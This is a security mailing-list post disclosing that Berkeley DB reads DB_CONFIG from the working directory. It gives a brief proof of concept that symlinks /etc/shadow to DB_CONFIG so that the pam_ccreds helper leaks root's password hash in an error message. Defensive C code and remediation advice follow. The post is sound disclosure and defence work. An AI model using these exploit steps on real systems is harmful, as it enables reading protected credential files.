oss-sec mailing list archives
Berkeley DB reads DB_CONFIG from cwd
From: Jakub Wilk <jwilk () jwilk net>
Date: Sun, 11 Jun 2017 00:06:13 +0200
Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.
Here's how to exploit it against pam_ccreds:

  $ cat /etc/shadow
  cat: /etc/shadow: Permission denied
  $ ln -sf /etc/shadow DB_CONFIG
  $ /sbin/ccreds_chkpwd moo < /dev/null
  BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair

(The above was tested on Debian jessie.)

In the past, nss_db was also exploitable: CVE-2010-0826[*]

More precisely, this seems to happen when you call db_create() with dbenv=NULL; or if you use the dbm_open() function.
-- Jakub Wilk
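As an added example, not code from Jakub Wilk's post nor from Berkeley DB or pam_ccreds, here is a defensive pre-flight check in C that a privileged helper could run before it opens a database handle with dbenv=NULL: it inspects DB_CONFIG in a given directory without following symlinks, refuses symlinks and files owned by anyone other than the caller or root, and provides a helper to move the working directory to a trusted location first. All function, type and enum names are hypothetical; the scratch directories and the symlink target /etc/hostname are constructed for the demonstration only.

```c
/* Added example (not from the original post): classify <dir>/DB_CONFIG
 * before letting a library that reads it from the cwd run. Names are
 * hypothetical. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

enum dbcfg_status {
    DBCFG_ABSENT = 0,      /* no DB_CONFIG present: nothing will be read */
    DBCFG_OK = 1,          /* regular file owned by us or root */
    DBCFG_SYMLINK = 2,     /* a symlink: refuse, it may point anywhere */
    DBCFG_FOREIGN = 3,     /* regular file owned by another user: refuse */
    DBCFG_NOT_REGULAR = 4, /* fifo, device, directory, ...: refuse */
    DBCFG_ERROR = -1       /* lstat or path construction failed */
};

/* Inspect <dir>/DB_CONFIG with lstat() so a symlink is seen as a symlink. */
enum dbcfg_status check_cwd_db_config(const char *dir)
{
    char path[4096];
    struct stat st;

    if (snprintf(path, sizeof path, "%s/DB_CONFIG", dir) >= (int)sizeof path)
        return DBCFG_ERROR;
    if (lstat(path, &st) != 0)
        return errno == ENOENT ? DBCFG_ABSENT : DBCFG_ERROR;
    if (S_ISLNK(st.st_mode))
        return DBCFG_SYMLINK;
    if (!S_ISREG(st.st_mode))
        return DBCFG_NOT_REGULAR;
    if (st.st_uid != geteuid() && st.st_uid != 0)
        return DBCFG_FOREIGN;
    return DBCFG_OK;
}

/* Move to a directory the helper trusts (e.g. "/") before any db_create()
 * or dbm_open() call, so a caller-controlled cwd is never consulted.
 * Returns 0 on success, -1 on failure. */
int pin_working_directory(const char *trusted_dir)
{
    return chdir(trusted_dir) == 0 ? 0 : -1;
}

/* Constructed scenario: scratch dir holding a DB_CONFIG symlink. */
enum dbcfg_status demo_symlink_case(void)
{
    char dir[] = "/tmp/dbcfg-demo-XXXXXX";
    char link[4096];
    enum dbcfg_status s;

    if (mkdtemp(dir) == NULL)
        return DBCFG_ERROR;
    snprintf(link, sizeof link, "%s/DB_CONFIG", dir);
    if (symlink("/etc/hostname", link) != 0) { /* harmless constructed target */
        rmdir(dir);
        return DBCFG_ERROR;
    }
    s = check_cwd_db_config(dir);
    unlink(link);
    rmdir(dir);
    return s;
}

/* Constructed scenario: scratch dir with a regular DB_CONFIG we own. */
enum dbcfg_status demo_ok_case(void)
{
    char dir[] = "/tmp/dbcfg-demo-XXXXXX";
    char file[4096];
    enum dbcfg_status s;
    int fd;

    if (mkdtemp(dir) == NULL)
        return DBCFG_ERROR;
    snprintf(file, sizeof file, "%s/DB_CONFIG", dir);
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) {
        rmdir(dir);
        return DBCFG_ERROR;
    }
    close(fd);
    s = check_cwd_db_config(dir);
    unlink(file);
    rmdir(dir);
    return s;
}

/* Constructed scenario: scratch dir with no DB_CONFIG at all. */
enum dbcfg_status demo_absent_case(void)
{
    char dir[] = "/tmp/dbcfg-demo-XXXXXX";
    enum dbcfg_status s;

    if (mkdtemp(dir) == NULL)
        return DBCFG_ERROR;
    s = check_cwd_db_config(dir);
    rmdir(dir);
    return s;
}

int main(void)
{
    printf("symlink: %d  ok: %d  absent: %d\n",
           demo_symlink_case(), demo_ok_case(), demo_absent_case());
    return 0;
}
```

The check is a stopgap for helpers that cannot immediately switch to an explicit environment; the more robust fix is to pin the working directory (or create a DB_ENV with a fixed home) so the library never looks at a directory the invoking user controls, and to make sure error paths do not echo file contents back to the caller.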